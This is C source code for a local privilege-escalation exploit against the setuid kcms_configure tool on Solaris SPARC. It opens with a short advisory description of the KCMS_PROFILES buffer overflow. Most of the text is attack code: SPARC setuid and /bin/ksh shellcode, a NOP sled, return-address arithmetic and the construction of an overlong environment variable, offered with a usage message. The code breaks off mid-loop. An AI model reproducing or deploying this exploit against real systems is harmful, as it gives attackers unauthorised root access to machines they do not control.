/* source: https://www.securityfocus.com/bid/2605/info The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker. The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. Exploits are available against Solaris x86 and Solaris Sparc. */ /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/ /*## kcsSUNWIOsolf.so #*/ #define NOPNUM 940 #define ADRNUM 32 #define PCHNUM 204 char setuidcode[]= "\x90\x08\x3f\xff" /* and %g0,-1,%o0 */ "\x82\x10\x20\x17" /* mov 0x17,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ ; char shellcode[]= "\x20\xbf\xff\xff" /* bn,a */ "\x20\xbf\xff\xff" /* bn,a */ "\x7f\xff\xff\xff" /* call */ "\x90\x03\xe0\x20" /* add %o7,32,%o0 */ "\x92\x02\x20\x10" /* add %o0,16,%o1 */ "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */ "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */ "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */ "\x82\x10\x20\x0b" /* mov 0xb,%g1 */ "\x91\xd0\x20\x08" /* ta 8 */ "/bin/ksh" ; char jump[]= "\x81\xc3\xe0\x08" /* jmp %o7+8 */ "\x90\x10\x00\x0e" /* mov %sp,%o0 */ ; static char nop[]="\x80\x1c\x40\x11"; main(int argc,char **argv){ char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128]; int i; printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/\n"); printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n"); if(argc!=2){ printf("usage: %s xserver:display\n",argv[0]); exit(-1); } *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112; *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112; sprintf(display,"DISPLAY=%s",argv[1]); envp[0]=buffer; envp[1]=display; envp[2]=0; b=buffer; sprintf(b,"KCMS_PROFILES="); b+=14; for(i=0;i